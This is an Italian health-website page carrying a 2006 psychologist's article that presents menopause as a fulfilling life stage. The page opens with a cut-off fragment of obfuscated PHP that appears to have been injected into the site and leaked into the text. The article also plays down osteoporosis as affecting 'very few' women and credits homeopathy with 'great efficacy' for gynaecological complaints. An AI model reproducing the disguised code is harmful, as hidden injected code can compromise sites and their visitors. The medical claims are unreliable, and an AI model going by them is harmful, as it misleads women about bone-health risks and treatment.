=round(0+3))$_59=$_64[round(0+0.333333333333+0.333333333333+0.333333333333)];if($GLOBALS['_1188104000_'][60]($_59)=round(0+0.6+0.6+0.6+0.6+0.6))$_59=$_64[round(0+0.5+0.5)];if($GLOBALS['_1188104000_'][73]($_59)=round(0+0.6+0.6+0.6+0.6+0.6))$_59=$_64[round(0+0.2+0.2+0.2+0.2+0.2)];if($GLOBALS['_1188104000_'][89]($_59)=round(0+0.6+0.6+0.6+0.6+0.6))$_59=$_64[round(0+0.333333333333+0.333333333333+0.333333333333)];if($GLOBALS['_1188104000_'][106]($_59) La menopausa

Area Riservata



Ti ricordiamo che per rendere attivo il tuo account dopo la registrazione, sarà necessario aprire il messaggio email che riceverai e cliccare sul link di attivazione.

  

Salute Mentale

La menopausa PDF 

4 ottobre 2006 - a cura di Annalisa Lo Monaco,  Psicologa - Consulente Sessuale e delle Relazioni Affettive

 

Prima di parlare della menopausa, condizione fisiologica della donna spesso avvertita come patologica, vorrei dire soprattutto quello che la menopausa non è: la menopausa non è l’inizio di un periodo di decadenza. In questa età si assiste invece, spesso, ad un aumento delle responsabilità sul lavoro e  dell’impegno in famiglia.

Negli ultimi 20 anni l’età delle primipare si è innalzata, per cui è facile incontrare donne di cinquant’anni alle prese con figli adolescenti e con le conseguenti varie problematiche;  sempre intorno a questa età, capita che  i propri genitori e/o suoceri comincino ad avere qualche problema di salute, condizione questa che determina un ulteriore dispendio di energie, per cui è un’età nella quale occorre esprimere grinta ed energia essendo  un periodo di massima produttività nel senso più ampio e significativo.

Capita a volte che le forze siano minori, si è però in grado di gestirle meglio; si è in grado, infatti, di svolgere attività e di fronteggiare stress continuativi come mai si sarebbe immaginato. Il corpo cambia, ed è proprio adesso che va curato con attenzione e amore. La legge di gravità opera contro? si corre ai ripari con ginnastica, massaggi e diete equilibrate per combatterla;  non è raro infatti vedere cinquantenni con fisici più curati di quando avevano trent’anni. A questa età si ha più cura di sé e ci si vuole finalmente bene: con il passare del tempo si è imparato a perdonarsi e a guardarsi con simpatia e ammirazione. E’ un’età magica: è l’età dell’oro, come da più parti è stata definita. Si sono finalmente lasciati alle spalle  sensi di colpa, insicurezze,  voglia di imporsi,  contrasti familiari, ripicche,  rancori e  poi, come afferma una saggia signora, non si è più un pericolo per giovani donne in caccia e anche questo è un bel sollievo. Il fascino è intatto, lo si palesa in modo più discreto ma sempre con successo.

Con la saggezza dell’età si comprende che le energie, in passato anche dissipate, devono essere ora gelosamente conservate per sé stesse. Spesso si riprendono studi o hobbies trascurati, si viaggia e si vanno a riallacciare le fila di un passato mai dimenticato e che si realizza prezioso per il presente. Se si è in coppia da tempo, è stato ormai superato lo scoglio dell’incomunicabilità e se si è deciso di restare con il proprio partner si tratta di una scelta consapevole. Osserviamo con tenerezza e affetto l’uomo che invecchierà accanto a noi (perché lui…invecchierà) e consideriamo che sta attraversando lo stesso momento; sarà importante allora migliorare e/o incrementare lo scambio affettivo ed emotivo, coltivare rapporti sociali e interessi comuni, cercando anche di avere rapporti sessuali regolari.

Se si è single, non devono essere più precluse situazioni interessanti dalle quali trarre  piacere, relax e svago. Sarà importante frequentare amiche/ci con le/i quali avere scambi ‘di qualità’,  scoprendo quello che offre la città in cui si vive da un punto di vista culturale, sociale, ecc…,  dedicando in ogni caso le proprie risorse soltanto ad eventi e situazioni che ci facciano sentire bene. Insomma si può scegliere: mai come adesso ci si deve concedere il lusso di farlo.

Altro aspetto importante è  di mantenere, nonostante impegni familiari anche pressanti, tempo libero per noi. Evitiamo di farci fagocitare e assorbire tutto il tempo e lo spazio. La meno-pausa, letteralmente senza-regole, segna la cessazione da parte delle ovaie della produzione degli estrogeni, ormoni femminili fondamentali per la riproduzione in quanto preposti alla maturazione dei follicoli e conseguente produzione di ovociti: insomma possiamo dare l’addio agli anticoncezionali. Questo è un aspetto importante per  la donna, per la scoperta di un piacere e di una sessualità migliore di prima. Cosa possiamo fare però per combattere la carenza degli estrogeni.? Un compito importante degli estrogeni è la fissazione del calcio sulle ossa, per cui con l’abbassamento di questi si pensa subito all’osteoporosi. Vorrei però ridimensionare questo allarmismo, di osteoporosi vera ne soffrono pochissime donne e quindi non preoccupiamoci più del dovuto. Chi non ha mai praticato attività fisica cominci a farlo regolarmente, perché l’esercizio fisico regolare aumenta la densità ossea, per cui camminare regolarmente almeno mezz’ora al giorno non giova solo all’umore ma è indispensabile. Teniamo sotto controllo tutto quello che accade nel nostro corpo con analisi e visite preventive, ci  accorgeremo così che in realtà non  sta accadendo nulla di particolare.

In caso di dubbi o disturbi confidatevi ed affidatevi al vostro medico e ginecologo; la qualità della vita può essere notevolmente migliorata attraverso una giusta alimentazione e una regolare attività fisica. E’ vero che la mancata produzione di estrogeni comporta dei fastidi tipo vampate ecc., però possono essere tenuti benissimo a bada, quando non siano eccessivamente fastidiosi con rimedi naturali. Sono sempre più numerosi i medici che, verso pazienti che non presentino nessun problema specifico, consigliano integrazioni con oligoelementi e/o prodotti fitoterapici per evitare appunto, i temuti effetti indesiderati quali sbalzi di temperatura, di umore, ritenzione idrica, ingrassamento ecc. Anche rivolgersi  con fiducia ad un medico omeopata può essere utile, perché in molti disturbi di tipo ginecologico, le terapie omeopatiche e/o alternative hanno grande efficacia.

Cultura vuole – o dovremmo forse dire sottocultura -  che  l’età fertile e creativa della donna sia solo associata al ciclo riproduttivo. Non è così. E’ il momento che la donna si appropri di questa età in quanto feconda e benefica per lei, iniziando, se non l’avesse già fatto, a esigere spazi, attenzioni e rispetto diversi per il proprio tempo ed i propri ritmi.

La vita assume un altro sapore e un altro profumo e ci si accorge di quanti orti e giardini mai guardati prima ci sono per noi con i loro frutti.

 

Per migliorare la tua navigazione su questo sito, utilizziamo cookies ed altre tecnologie che ci permettono di riconoscerti. Utilizzando questo sito, acconsenti agli utilizzi di cookies e delle altre tecnologie descritti nella nostra Cookies Policy Utilizzando questo sito, acconsenti agli utilizzi di cookies e delle altre tecnologie descritti nella nostra Cookies Policy.

Acconsento all'utilizzo dei cookies su questo sito